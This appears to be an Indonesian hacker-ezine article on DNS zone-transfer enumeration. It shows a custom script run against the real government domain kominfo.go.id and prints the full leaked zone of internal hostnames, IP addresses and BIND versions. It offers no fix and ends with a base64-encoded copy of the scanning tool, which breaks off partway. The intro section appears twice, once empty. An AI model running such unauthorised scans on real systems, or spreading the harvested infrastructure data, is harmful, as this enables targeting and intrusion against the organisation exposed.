Penulis: Biomechanical Artificial Machine Built for Assassination and Nocturnal Gratification a.k.a BAMBANG [float='right'][/float]
-----[ Pendahuluan
1.) "Google" or any search engine and built-in "man" is your best friend!!!
2.) Apa itu DNS ?*
3.) Apa itu Name Server ?*
4.) Apa itu domain ?*
5.) Bagaimana cara kerja DNS Server ?*
6.) Apa itu "enumerasi" ?*
7.) DNS Server akan menjawab setiap ada "Questions" request dari client.
8.) Misconfiguration (salah config) DNS Server dapat menyebabkan informasi yang diberikan akan berlebihan dan dapat disalahgunakan atau (ab)used.
9.) Syarat dan ketentuan berlaku ditandai dengan (*) dan (**) dapat dilihat diakhir ezine pada bagian E0F.
-----[ Langkah-langkah
1.) Install man.
2.) Install dig.
3.) man dig (RTFM!!!)
4.) Profit ?!?!?!
-----[ P0C
1.) Piye Om Carane ?
--8<--8<--8<--8<--8<--BEGIN--8<--8<--8<--8<--8<--
--8<--8<--8<--8<--8<--E0F--8<--8<--8<--8<--8<--
-----[ Kesimpulan
1.) Bisa dilihat sendiri, mari ambil contoh untuk domain kominfo.go.id yang di"handle" oleh ns4.kominfo.go.id. sebagai salah satu DNS servernya memberikan informasi yang berlebihan ketika ada "Questions" request dari client. Sebagai sbb :
-----[ Solusi
1.) Terus gimana cara patchnya atau supaya ga misconfig ?**
-----[ Greetz
1.) What ? Greetz ? Elu aja ama temen2 lu yg isi materi cuman sedikit tapi greetz nya banyak bener ngalahin isi materinya,
mana nama2 yg di greetz nya keq alay semua.
-----[ Source
-----[ Disclaimer
WARNING!!! For Educational Purpose ONLY!!!
-----[ E0F
Syarat dan ketentuan berlaku sebagai berikut :
* Klo jawabannya ada di google atau di manual "man" berarti gua ga perlu jawab.
** Gua terlahir bukan buat ngajarin elu.
-----[ Pendahuluan
1.) "Google" or any search engine and built-in "man" is your best friend!!!
2.) Apa itu DNS ?*
3.) Apa itu Name Server ?*
4.) Apa itu domain ?*
5.) Bagaimana cara kerja DNS Server ?*
6.) Apa itu "enumerasi" ?*
7.) DNS Server akan menjawab setiap ada "Questions" request dari client.
8.) Misconfiguration (salah config) DNS Server dapat menyebabkan informasi yang diberikan akan berlebihan dan dapat disalahgunakan atau (ab)used.
9.) Syarat dan ketentuan berlaku ditandai dengan (*) dan (**) dapat dilihat diakhir ezine pada bagian E0F.
-----[ Langkah-langkah
1.) Install man.
2.) Install dig.
3.) man dig (RTFM!!!)
4.) Profit ?!?!?!
-----[ P0C
1.) Piye Om Carane ?
--8<--8<--8<--8<--8<--BEGIN--8<--8<--8<--8<--8<--
Code:
$ ./abiumi kominfo.go.id
====================================================================================
[+] NS server for kominfo.go.id domain found :
ns2.kominfo.go.id.
ns3.kominfo.go.id.
ns4.kominfo.go.id.
ns1.kominfo.go.id.
====================================================================================
[+] Enumerating ns2.kominfo.go.id. server...
[+] NS server version : "9.7.3"
[+] NS server hostname : "ns2"
[+] Querying ns2.kominfo.go.id. server :
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.3 <<>> @ns2.kominfo.go.id.
AXFR kominfo.go.id
; (1 server found)
;; global options: +cmd
kominfo.go.id. 600 IN SOA ns1.kominfo.go.id.
penjaga\@kominfo.go.id. 2012092816 3600 600 86400 900
kominfo.go.id. 600 IN MX 10 mx3.kominfo.go.id.
kominfo.go.id. 600 IN MX 20 webmail.kominfo.go.id.
kominfo.go.id. 600 IN MX 30 mx4.kominfo.go.id.
kominfo.go.id. 600 IN A 202.89.117.5
kominfo.go.id. 600 IN TXT "v=spf1 mx ip4:202.89.117.0/27
-all"
kominfo.go.id. 600 IN NS ns1.kominfo.go.id.
kominfo.go.id. 600 IN NS ns2.kominfo.go.id.
kominfo.go.id. 600 IN NS ns3.kominfo.go.id.
kominfo.go.id. 600 IN NS ns4.kominfo.go.id.
aptika.kominfo.go.id. 600 IN A 202.89.116.38
eoffice.aptika.kominfo.go.id. 600 IN A 202.89.116.75
spektra.aptika.kominfo.go.id. 600 IN A 202.89.116.38
www.aptika.kominfo.go.id. 600 IN A 202.89.116.38
stream.asem.kominfo.go.id. 600 IN A 118.97.187.162
www.stream.asem.kominfo.go.id. 600 IN A 118.97.187.162
asem-indonesia.kominfo.go.id. 600 IN A 202.89.116.39
www.asem-indonesia.kominfo.go.id. 600 IN A 202.89.116.39
audit.kominfo.go.id. 600 IN A 202.89.117.6
bakohumas.kominfo.go.id. 600 IN A 49.50.8.21
www.bakohumas.kominfo.go.id. 600 IN A 49.50.8.21
balitbang.kominfo.go.id. 600 IN A 202.89.117.45
www.asem-ict.balitbang.kominfo.go.id. 600 IN CNAME balitbang.kominfo.go.id.
www.balitbang.kominfo.go.id. 600 IN CNAME balitbang.kominfo.go.id.
bko.kominfo.go.id. 600 IN A 202.89.117.43
www.bko.kominfo.go.id. 600 IN A 202.89.117.43
bp2se.kominfo.go.id. 600 IN CNAME bpca.kominfo.go.id.
www.bp2se.kominfo.go.id. 600 IN CNAME bpca.kominfo.go.id.
bpca.kominfo.go.id. 600 IN A 202.89.116.94
www.bpca.kominfo.go.id. 600 IN A 202.89.116.94
bpptik.kominfo.go.id. 600 IN A 202.89.117.43
www.bpptik.kominfo.go.id. 600 IN A 202.89.117.43
bprtik.kominfo.go.id. 600 IN A 114.134.75.74
bo.bprtik.kominfo.go.id. 600 IN A 114.134.75.75
content.bprtik.kominfo.go.id. 600 IN A 114.134.75.76
elearn.bprtik.kominfo.go.id. 600 IN A 114.134.75.70
elib.bprtik.kominfo.go.id. 600 IN A 114.134.75.71
groupware.bprtik.kominfo.go.id. 600 IN A 114.134.75.73
mail.bprtik.kominfo.go.id. 600 IN MX 10 mail.bprtik.kominfo.go.id.
mail.bprtik.kominfo.go.id. 600 IN A 114.134.75.83
proxy.bprtik.kominfo.go.id. 600 IN A 114.134.75.82
rnd1.bprtik.kominfo.go.id. 600 IN A 114.134.75.78
rnd2.bprtik.kominfo.go.id. 600 IN A 114.134.75.77
rnd3.bprtik.kominfo.go.id. 600 IN A 114.134.75.81
search.bprtik.kominfo.go.id. 600 IN A 114.134.75.69
vod.bprtik.kominfo.go.id. 600 IN A 114.134.75.72
www.bprtik.kominfo.go.id. 600 IN A 114.134.75.74
cermin.kominfo.go.id. 600 IN A 202.89.116.37
coba.kominfo.go.id. 600 IN A 118.98.73.60
www.coba.kominfo.go.id. 600 IN A 118.98.73.60
data.kominfo.go.id. 600 IN A 202.89.116.13
detiknas.kominfo.go.id. 600 IN A 202.89.117.6
www.detiknas.kominfo.go.id. 600 IN A 202.89.117.6
dev.kominfo.go.id. 600 IN A 202.89.117.50
www.dev.kominfo.go.id. 600 IN A 202.89.117.50
dev1.kominfo.go.id. 600 IN A 118.98.73.59
dms.kominfo.go.id. 600 IN A 202.89.116.41
www.dms.kominfo.go.id. 600 IN A 202.89.116.41
e-learning.kominfo.go.id. 600 IN A 120.136.18.82
e-learning.kominfo.go.id. 600 IN A 120.136.18.83
www.e-learning.kominfo.go.id. 600 IN A 120.136.18.82
www.e-learning.kominfo.go.id. 600 IN A 120.136.18.83
e-office.kominfo.go.id. 600 IN A 202.89.116.39
www.e-office.kominfo.go.id. 600 IN A 202.89.116.39
e-penyiaran.kominfo.go.id. 600 IN A 202.89.116.37
www.e-penyiaran.kominfo.go.id. 600 IN A 202.89.116.37
ecom.kominfo.go.id. 600 IN A 202.89.116.39
ecpns.kominfo.go.id. 600 IN A 202.89.117.59
egov.kominfo.go.id. 600 IN A 202.89.116.94
www.egov.kominfo.go.id. 600 IN A 202.89.116.94
ehealth-rescue.kominfo.go.id. 600 IN A 202.89.116.226
elghd-indonesia.kominfo.go.id. 600 IN A 119.235.20.2
fellow.kominfo.go.id. 600 IN MX 10 mx3.kominfo.go.id.
fellow.kominfo.go.id. 600 IN MX 20 webmail.kominfo.go.id.
gis.kominfo.go.id. 600 IN A 202.89.117.46
gtw-116.kominfo.go.id. 600 IN A 202.89.116.1
gtw-117.kominfo.go.id. 600 IN A 202.89.117.1
helpdesk.kominfo.go.id. 600 IN A 202.89.116.36
hilal.kominfo.go.id. 600 IN A 202.89.117.19
m.hilal.kominfo.go.id. 600 IN A 202.89.117.19
www.hilal.kominfo.go.id. 600 IN A 202.89.117.19
hilal1.kominfo.go.id. 600 IN A 202.89.117.43
hilal2.kominfo.go.id. 600 IN A 202.89.117.19
hilal3.kominfo.go.id. 600 IN A 202.46.1.46
hosting.kominfo.go.id. 600 IN A 202.89.117.34
id-sirtii.kominfo.go.id. 600 IN A 202.89.117.6
www.id-sirtii.kominfo.go.id. 600 IN A 202.89.117.6
iisf.kominfo.go.id. 600 IN A 202.89.117.43
submission.iisf.kominfo.go.id. 600 IN A 202.89.117.43
www.iisf.kominfo.go.id. 600 IN A 202.89.117.43
ikp.kominfo.go.id. 600 IN A 114.31.243.246
www.ikp.kominfo.go.id. 600 IN A 114.31.243.246
imap.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
indimine.kominfo.go.id. 600 IN A 202.89.117.66
infopublik.kominfo.go.id. 600 IN A 114.31.243.131
www.infopublik.kominfo.go.id. 600 IN A 114.31.243.131
insting.kominfo.go.id. 600 IN A 103.8.238.9
www.insting.kominfo.go.id. 600 IN A 103.8.238.9
intra.kominfo.go.id. 600 IN A 202.89.117.6
jejaringhukum.kominfo.go.id. 600 IN A 202.89.116.39
www.jejaringhukum.kominfo.go.id. 600 IN A 202.89.116.39
jurnal.kominfo.go.id. 600 IN A 202.89.117.43
www.jurnal.kominfo.go.id. 600 IN A 202.89.117.43
konferensi.kominfo.go.id. 600 IN A 202.89.117.43
www.konferensi.kominfo.go.id. 600 IN A 202.89.117.43
lab.kominfo.go.id. 600 IN A 202.89.117.20
ldap.kominfo.go.id. 600 IN A 202.89.117.3
list.kominfo.go.id. 600 IN MX 10 mx2.kominfo.go.id.
list.kominfo.go.id. 600 IN MX 20 mx3.kominfo.go.id.
list.kominfo.go.id. 600 IN A 202.89.117.17
m.kominfo.go.id. 600 IN A 202.89.117.5
mail.kominfo.go.id. 600 IN MX 10 mx2.kominfo.go.id.
mail.kominfo.go.id. 600 IN MX 20 mx3.kominfo.go.id.
mail.kominfo.go.id. 600 IN A 202.89.117.17
mediacenter.kominfo.go.id. 600 IN A 114.31.243.146
www.mediacenter.kominfo.go.id. 600 IN A 114.31.243.146
mirror.kominfo.go.id. 600 IN A 202.89.116.40
mpn.kominfo.go.id. 600 IN A 118.96.136.242
www.mpn.kominfo.go.id. 600 IN A 118.96.136.242
muspen.kominfo.go.id. 600 IN A 202.89.117.43
www.muspen.kominfo.go.id. 600 IN A 202.89.117.43
mx1.kominfo.go.id. 600 IN A 202.89.117.16
mx2.kominfo.go.id. 600 IN A 202.89.117.17
mx3.kominfo.go.id. 600 IN A 202.89.117.18
mx4.kominfo.go.id. 600 IN A 118.98.73.58
netmon.kominfo.go.id. 600 IN A 202.89.117.55
m.netmon.kominfo.go.id. 600 IN A 202.89.117.55
ns1.kominfo.go.id. 600 IN A 202.89.117.2
ns2.kominfo.go.id. 600 IN A 202.89.117.3
ns3.kominfo.go.id. 600 IN A 202.89.117.4
ns4.kominfo.go.id. 600 IN A 118.98.73.58
ntp1.kominfo.go.id. 600 IN A 202.89.117.2
ntp2.kominfo.go.id. 600 IN A 202.89.117.3
ntp3.kominfo.go.id. 600 IN A 202.89.117.4
pengadaannasional.kominfo.go.id. 600 IN A 116.66.201.8
pi.kominfo.go.id. 600 IN A 182.23.46.9
www.pi.kominfo.go.id. 600 IN A 182.23.46.9
pih.kominfo.go.id. 600 IN A 202.89.116.161
pm.kominfo.go.id. 600 IN A 202.89.117.50
pop3.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
postel.kominfo.go.id. 600 IN A 202.89.116.40
ppid.kominfo.go.id. 600 IN A 202.89.117.43
www.ppid.kominfo.go.id. 600 IN A 202.89.117.43
proxy.kominfo.go.id. 600 IN A 202.89.117.7
proxy.kominfo.go.id. 600 IN A 202.89.117.8
proxy.kominfo.go.id. 600 IN A 202.89.117.10
proxy1.kominfo.go.id. 600 IN A 202.89.117.7
proxy2.kominfo.go.id. 600 IN A 202.89.117.8
publikasi.kominfo.go.id. 600 IN A 202.89.117.42
pusdiklat.kominfo.go.id. 600 IN A 58.147.184.134
www.pusdiklat.kominfo.go.id. 600 IN A 58.147.184.134
pustiknas.kominfo.go.id. 600 IN A 182.16.240.5
bo.pustiknas.kominfo.go.id. 600 IN A 182.16.240.11
elearn.pustiknas.kominfo.go.id. 600 IN A 182.16.240.7
elib.pustiknas.kominfo.go.id. 600 IN A 182.16.240.6
rb.kominfo.go.id. 600 IN A 202.89.117.43
www.rb.kominfo.go.id. 600 IN A 202.89.117.43
sdppi.kominfo.go.id. 600 IN A 202.58.238.3
www.sdppi.kominfo.go.id. 600 IN A 202.58.238.3
seleksi.kominfo.go.id. 600 IN A 202.89.117.6
sepp.kominfo.go.id. 600 IN A 116.66.201.14
socrates.sepp.kominfo.go.id. 600 IN A 116.66.201.14
socrates2.sepp.kominfo.go.id. 600 IN A 119.235.29.142
www.sepp.kominfo.go.id. 600 IN A 116.66.201.14
simpatik.kominfo.go.id. 600 IN A 202.89.117.43
www.simpatik.kominfo.go.id. 600 IN A 202.89.117.43
simppbmn.kominfo.go.id. 600 IN A 202.89.116.35
smtp.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
statistik.kominfo.go.id. 600 IN A 202.89.117.42
www.statistik.kominfo.go.id. 600 IN A 202.89.117.42
stream1.kominfo.go.id. 600 IN A 202.89.117.42
stream2.kominfo.go.id. 600 IN A 202.89.117.66
stream3.kominfo.go.id. 600 IN A 202.89.117.60
stream4.kominfo.go.id. 600 IN A 118.98.73.99
survei-rti.kominfo.go.id. 600 IN A 202.89.117.66
trustpositif.kominfo.go.id. 600 IN A 202.89.116.94
www.trustpositif.kominfo.go.id. 600 IN A 202.89.116.94
tvdigital.kominfo.go.id. 600 IN A 72.9.153.63
www.tvdigital.kominfo.go.id. 600 IN A 72.9.153.63
ujipublik.kominfo.go.id. 600 IN A 202.89.117.43
www.ujipublik.kominfo.go.id. 600 IN A 202.89.117.43
videotron.kominfo.go.id. 600 IN A 202.89.117.43
web.kominfo.go.id. 600 IN A 202.89.117.5
webmail.kominfo.go.id. 600 IN A 202.89.117.16
webmail2.kominfo.go.id. 600 IN A 202.89.117.16
websip.kominfo.go.id. 600 IN A 202.89.116.39
www.kominfo.go.id. 600 IN A 202.89.117.5
www2.kominfo.go.id. 600 IN A 202.89.117.6
kominfo.go.id. 600 IN SOA ns1.kominfo.go.id.
penjaga\@kominfo.go.id. 2012092816 3600 600 86400 900
;; Query time: 15 msec
;; SERVER: 202.89.117.3#53(202.89.117.3)
;; WHEN: Mon Oct 1 02:04:52 2012
;; XFR size: 189 records (messages 1, bytes 4178)
====================================================================================
[+] Enumerating ns3.kominfo.go.id. server...
[+] NS server version :
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.3 <<>> @ns3.kominfo.go.id. -c
CH -t txt version.bind +short
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached
[+] NS server hostname :
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.3 <<>> @ns3.kominfo.go.id. -c
CH -t txt hostname.bind +short
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached
[+] Querying ns3.kominfo.go.id. server : ;; Connection to
202.89.117.4#53(202.89.117.4) for kominfo.go.id failed: host unreachable.
====================================================================================
[+] Enumerating ns4.kominfo.go.id. server...
[+] NS server version : "9.7.3"
[+] NS server hostname : "ns4.kominfo.go.id"
[+] Querying ns4.kominfo.go.id. server :
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.3 <<>> @ns4.kominfo.go.id.
AXFR kominfo.go.id
; (1 server found)
;; global options: +cmd
kominfo.go.id. 600 IN SOA ns1.kominfo.go.id.
penjaga\@kominfo.go.id. 2012092816 3600 600 86400 900
kominfo.go.id. 600 IN MX 10 mx3.kominfo.go.id.
kominfo.go.id. 600 IN MX 20 webmail.kominfo.go.id.
kominfo.go.id. 600 IN MX 30 mx4.kominfo.go.id.
kominfo.go.id. 600 IN A 202.89.117.5
kominfo.go.id. 600 IN TXT "v=spf1 mx ip4:202.89.117.0/27
-all"
kominfo.go.id. 600 IN NS ns1.kominfo.go.id.
kominfo.go.id. 600 IN NS ns2.kominfo.go.id.
kominfo.go.id. 600 IN NS ns3.kominfo.go.id.
kominfo.go.id. 600 IN NS ns4.kominfo.go.id.
aptika.kominfo.go.id. 600 IN A 202.89.116.38
eoffice.aptika.kominfo.go.id. 600 IN A 202.89.116.75
spektra.aptika.kominfo.go.id. 600 IN A 202.89.116.38
www.aptika.kominfo.go.id. 600 IN A 202.89.116.38
stream.asem.kominfo.go.id. 600 IN A 118.97.187.162
www.stream.asem.kominfo.go.id. 600 IN A 118.97.187.162
asem-indonesia.kominfo.go.id. 600 IN A 202.89.116.39
www.asem-indonesia.kominfo.go.id. 600 IN A 202.89.116.39
audit.kominfo.go.id. 600 IN A 202.89.117.6
bakohumas.kominfo.go.id. 600 IN A 49.50.8.21
www.bakohumas.kominfo.go.id. 600 IN A 49.50.8.21
balitbang.kominfo.go.id. 600 IN A 202.89.117.45
www.asem-ict.balitbang.kominfo.go.id. 600 IN CNAME balitbang.kominfo.go.id.
www.balitbang.kominfo.go.id. 600 IN CNAME balitbang.kominfo.go.id.
bko.kominfo.go.id. 600 IN A 202.89.117.43
www.bko.kominfo.go.id. 600 IN A 202.89.117.43
bp2se.kominfo.go.id. 600 IN CNAME bpca.kominfo.go.id.
www.bp2se.kominfo.go.id. 600 IN CNAME bpca.kominfo.go.id.
bpca.kominfo.go.id. 600 IN A 202.89.116.94
www.bpca.kominfo.go.id. 600 IN A 202.89.116.94
bpptik.kominfo.go.id. 600 IN A 202.89.117.43
www.bpptik.kominfo.go.id. 600 IN A 202.89.117.43
bprtik.kominfo.go.id. 600 IN A 114.134.75.74
bo.bprtik.kominfo.go.id. 600 IN A 114.134.75.75
content.bprtik.kominfo.go.id. 600 IN A 114.134.75.76
elearn.bprtik.kominfo.go.id. 600 IN A 114.134.75.70
elib.bprtik.kominfo.go.id. 600 IN A 114.134.75.71
groupware.bprtik.kominfo.go.id. 600 IN A 114.134.75.73
mail.bprtik.kominfo.go.id. 600 IN MX 10 mail.bprtik.kominfo.go.id.
mail.bprtik.kominfo.go.id. 600 IN A 114.134.75.83
proxy.bprtik.kominfo.go.id. 600 IN A 114.134.75.82
rnd1.bprtik.kominfo.go.id. 600 IN A 114.134.75.78
rnd2.bprtik.kominfo.go.id. 600 IN A 114.134.75.77
rnd3.bprtik.kominfo.go.id. 600 IN A 114.134.75.81
search.bprtik.kominfo.go.id. 600 IN A 114.134.75.69
vod.bprtik.kominfo.go.id. 600 IN A 114.134.75.72
www.bprtik.kominfo.go.id. 600 IN A 114.134.75.74
cermin.kominfo.go.id. 600 IN A 202.89.116.37
coba.kominfo.go.id. 600 IN A 118.98.73.60
www.coba.kominfo.go.id. 600 IN A 118.98.73.60
data.kominfo.go.id. 600 IN A 202.89.116.13
detiknas.kominfo.go.id. 600 IN A 202.89.117.6
www.detiknas.kominfo.go.id. 600 IN A 202.89.117.6
dev.kominfo.go.id. 600 IN A 202.89.117.50
www.dev.kominfo.go.id. 600 IN A 202.89.117.50
dev1.kominfo.go.id. 600 IN A 118.98.73.59
dms.kominfo.go.id. 600 IN A 202.89.116.41
www.dms.kominfo.go.id. 600 IN A 202.89.116.41
e-learning.kominfo.go.id. 600 IN A 120.136.18.82
e-learning.kominfo.go.id. 600 IN A 120.136.18.83
www.e-learning.kominfo.go.id. 600 IN A 120.136.18.82
www.e-learning.kominfo.go.id. 600 IN A 120.136.18.83
e-office.kominfo.go.id. 600 IN A 202.89.116.39
www.e-office.kominfo.go.id. 600 IN A 202.89.116.39
e-penyiaran.kominfo.go.id. 600 IN A 202.89.116.37
www.e-penyiaran.kominfo.go.id. 600 IN A 202.89.116.37
ecom.kominfo.go.id. 600 IN A 202.89.116.39
ecpns.kominfo.go.id. 600 IN A 202.89.117.59
egov.kominfo.go.id. 600 IN A 202.89.116.94
www.egov.kominfo.go.id. 600 IN A 202.89.116.94
ehealth-rescue.kominfo.go.id. 600 IN A 202.89.116.226
elghd-indonesia.kominfo.go.id. 600 IN A 119.235.20.2
fellow.kominfo.go.id. 600 IN MX 10 mx3.kominfo.go.id.
fellow.kominfo.go.id. 600 IN MX 20 webmail.kominfo.go.id.
gis.kominfo.go.id. 600 IN A 202.89.117.46
gtw-116.kominfo.go.id. 600 IN A 202.89.116.1
gtw-117.kominfo.go.id. 600 IN A 202.89.117.1
helpdesk.kominfo.go.id. 600 IN A 202.89.116.36
hilal.kominfo.go.id. 600 IN A 202.89.117.19
m.hilal.kominfo.go.id. 600 IN A 202.89.117.19
www.hilal.kominfo.go.id. 600 IN A 202.89.117.19
hilal1.kominfo.go.id. 600 IN A 202.89.117.43
hilal2.kominfo.go.id. 600 IN A 202.89.117.19
hilal3.kominfo.go.id. 600 IN A 202.46.1.46
hosting.kominfo.go.id. 600 IN A 202.89.117.34
id-sirtii.kominfo.go.id. 600 IN A 202.89.117.6
www.id-sirtii.kominfo.go.id. 600 IN A 202.89.117.6
iisf.kominfo.go.id. 600 IN A 202.89.117.43
submission.iisf.kominfo.go.id. 600 IN A 202.89.117.43
www.iisf.kominfo.go.id. 600 IN A 202.89.117.43
ikp.kominfo.go.id. 600 IN A 114.31.243.246
www.ikp.kominfo.go.id. 600 IN A 114.31.243.246
imap.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
indimine.kominfo.go.id. 600 IN A 202.89.117.66
infopublik.kominfo.go.id. 600 IN A 114.31.243.131
www.infopublik.kominfo.go.id. 600 IN A 114.31.243.131
insting.kominfo.go.id. 600 IN A 103.8.238.9
www.insting.kominfo.go.id. 600 IN A 103.8.238.9
intra.kominfo.go.id. 600 IN A 202.89.117.6
jejaringhukum.kominfo.go.id. 600 IN A 202.89.116.39
www.jejaringhukum.kominfo.go.id. 600 IN A 202.89.116.39
jurnal.kominfo.go.id. 600 IN A 202.89.117.43
www.jurnal.kominfo.go.id. 600 IN A 202.89.117.43
konferensi.kominfo.go.id. 600 IN A 202.89.117.43
www.konferensi.kominfo.go.id. 600 IN A 202.89.117.43
lab.kominfo.go.id. 600 IN A 202.89.117.20
ldap.kominfo.go.id. 600 IN A 202.89.117.3
list.kominfo.go.id. 600 IN MX 10 mx2.kominfo.go.id.
list.kominfo.go.id. 600 IN MX 20 mx3.kominfo.go.id.
list.kominfo.go.id. 600 IN A 202.89.117.17
m.kominfo.go.id. 600 IN A 202.89.117.5
mail.kominfo.go.id. 600 IN MX 10 mx2.kominfo.go.id.
mail.kominfo.go.id. 600 IN MX 20 mx3.kominfo.go.id.
mail.kominfo.go.id. 600 IN A 202.89.117.17
mediacenter.kominfo.go.id. 600 IN A 114.31.243.146
www.mediacenter.kominfo.go.id. 600 IN A 114.31.243.146
mirror.kominfo.go.id. 600 IN A 202.89.116.40
mpn.kominfo.go.id. 600 IN A 118.96.136.242
www.mpn.kominfo.go.id. 600 IN A 118.96.136.242
muspen.kominfo.go.id. 600 IN A 202.89.117.43
www.muspen.kominfo.go.id. 600 IN A 202.89.117.43
mx1.kominfo.go.id. 600 IN A 202.89.117.16
mx2.kominfo.go.id. 600 IN A 202.89.117.17
mx3.kominfo.go.id. 600 IN A 202.89.117.18
mx4.kominfo.go.id. 600 IN A 118.98.73.58
netmon.kominfo.go.id. 600 IN A 202.89.117.55
m.netmon.kominfo.go.id. 600 IN A 202.89.117.55
ns1.kominfo.go.id. 600 IN A 202.89.117.2
ns2.kominfo.go.id. 600 IN A 202.89.117.3
ns3.kominfo.go.id. 600 IN A 202.89.117.4
ns4.kominfo.go.id. 600 IN A 118.98.73.58
ntp1.kominfo.go.id. 600 IN A 202.89.117.2
ntp2.kominfo.go.id. 600 IN A 202.89.117.3
ntp3.kominfo.go.id. 600 IN A 202.89.117.4
pengadaannasional.kominfo.go.id. 600 IN A 116.66.201.8
pi.kominfo.go.id. 600 IN A 182.23.46.9
www.pi.kominfo.go.id. 600 IN A 182.23.46.9
pih.kominfo.go.id. 600 IN A 202.89.116.161
pm.kominfo.go.id. 600 IN A 202.89.117.50
pop3.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
postel.kominfo.go.id. 600 IN A 202.89.116.40
ppid.kominfo.go.id. 600 IN A 202.89.117.43
www.ppid.kominfo.go.id. 600 IN A 202.89.117.43
proxy.kominfo.go.id. 600 IN A 202.89.117.7
proxy.kominfo.go.id. 600 IN A 202.89.117.8
proxy.kominfo.go.id. 600 IN A 202.89.117.10
proxy1.kominfo.go.id. 600 IN A 202.89.117.7
proxy2.kominfo.go.id. 600 IN A 202.89.117.8
publikasi.kominfo.go.id. 600 IN A 202.89.117.42
pusdiklat.kominfo.go.id. 600 IN A 58.147.184.134
www.pusdiklat.kominfo.go.id. 600 IN A 58.147.184.134
pustiknas.kominfo.go.id. 600 IN A 182.16.240.5
bo.pustiknas.kominfo.go.id. 600 IN A 182.16.240.11
elearn.pustiknas.kominfo.go.id. 600 IN A 182.16.240.7
elib.pustiknas.kominfo.go.id. 600 IN A 182.16.240.6
rb.kominfo.go.id. 600 IN A 202.89.117.43
www.rb.kominfo.go.id. 600 IN A 202.89.117.43
sdppi.kominfo.go.id. 600 IN A 202.58.238.3
www.sdppi.kominfo.go.id. 600 IN A 202.58.238.3
seleksi.kominfo.go.id. 600 IN A 202.89.117.6
sepp.kominfo.go.id. 600 IN A 116.66.201.14
socrates.sepp.kominfo.go.id. 600 IN A 116.66.201.14
socrates2.sepp.kominfo.go.id. 600 IN A 119.235.29.142
www.sepp.kominfo.go.id. 600 IN A 116.66.201.14
simpatik.kominfo.go.id. 600 IN A 202.89.117.43
www.simpatik.kominfo.go.id. 600 IN A 202.89.117.43
simppbmn.kominfo.go.id. 600 IN A 202.89.116.35
smtp.kominfo.go.id. 600 IN CNAME webmail.kominfo.go.id.
statistik.kominfo.go.id. 600 IN A 202.89.117.42
www.statistik.kominfo.go.id. 600 IN A 202.89.117.42
stream1.kominfo.go.id. 600 IN A 202.89.117.42
stream2.kominfo.go.id. 600 IN A 202.89.117.66
stream3.kominfo.go.id. 600 IN A 202.89.117.60
stream4.kominfo.go.id. 600 IN A 118.98.73.99
survei-rti.kominfo.go.id. 600 IN A 202.89.117.66
trustpositif.kominfo.go.id. 600 IN A 202.89.116.94
www.trustpositif.kominfo.go.id. 600 IN A 202.89.116.94
tvdigital.kominfo.go.id. 600 IN A 72.9.153.63
www.tvdigital.kominfo.go.id. 600 IN A 72.9.153.63
ujipublik.kominfo.go.id. 600 IN A 202.89.117.43
www.ujipublik.kominfo.go.id. 600 IN A 202.89.117.43
videotron.kominfo.go.id. 600 IN A 202.89.117.43
web.kominfo.go.id. 600 IN A 202.89.117.5
webmail.kominfo.go.id. 600 IN A 202.89.117.16
webmail2.kominfo.go.id. 600 IN A 202.89.117.16
websip.kominfo.go.id. 600 IN A 202.89.116.39
www.kominfo.go.id. 600 IN A 202.89.117.5
www2.kominfo.go.id. 600 IN A 202.89.117.6
kominfo.go.id. 600 IN SOA ns1.kominfo.go.id.
penjaga\@kominfo.go.id. 2012092816 3600 600 86400 900
;; Query time: 12 msec
;; SERVER: 118.98.73.58#53(118.98.73.58)
;; WHEN: Mon Oct 1 02:05:32 2012
;; XFR size: 189 records (messages 1, bytes 4178)
====================================================================================
[+] Enumerating ns1.kominfo.go.id. server...
[+] NS server version : "9.7.3"
[+] NS server hostname : "ns1"
[+] Querying ns1.kominfo.go.id. server :
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.10.rc1.el6_3.3 <<>> @ns1.kominfo.go.id.
AXFR kominfo.go.id
; (1 server found)
;; global options: +cmd
; Transfer failed.
-----[ Kesimpulan
1.) Bisa dilihat sendiri, mari ambil contoh untuk domain kominfo.go.id yang di"handle" oleh ns4.kominfo.go.id. sebagai salah satu DNS servernya memberikan informasi yang berlebihan ketika ada "Questions" request dari client. Sebagai sbb :
Code:
[+] Enumerating ns4.kominfo.go.id. server...
[+] NS server version : "9.7.3" <-------------- Ini adalah versi BIND dari server tersebut.
[+] NS server hostname : "ns4.kominfo.go.id" <-- Ini adalah hostname dari server tersebut.
[+] Querying ns4.kominfo.go.id. server : <-------- Ini paling parah, dia menjawab dengan memberikan semua list (sub)domain
dari domain kominfo.go.id dengan details diatas pada bagian P0C (Proof Of Concept).
-----[ Solusi
1.) Terus gimana cara patchnya atau supaya ga misconfig ?**
-----[ Greetz
1.) What ? Greetz ? Elu aja ama temen2 lu yg isi materi cuman sedikit tapi greetz nya banyak bener ngalahin isi materinya,
mana nama2 yg di greetz nya keq alay semua.
-----[ Source
Code:
n-base64 700 abiumi
IyEvYmluL2Jhc2gKIyBEaWcgTlMgc2VydmVyIEFYRlIgcXVlcnkgdG9vbHMg
djAuMWIKIyB2MC4xYiAwMS8xMC8yMDEyIH4gLWlkay0KIyB2MC4xYSAyMS8w
OC8yMDEyIH4gLWlkay0gCiMgcmVzZXQKTlM9YGRpZyAtdCBOUyAkMSArc2hv
cnRgOwplY2hvICIKPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09ClsrXSBOUyBzZXJ2ZXIgZm9yICQxIGRvbWFpbiBmb3VuZCA6CiRO
UyAKIgpmb3IgQUJJIGluICROUzsgZG8KCVVNST1gZWNobyAkQUJJYDsKCVZS
PWBkaWcgQCIkVU1JIiAtYyBDSCAtdCB0eHQgdmVyc2lvbi5iaW5kICtzaG9y
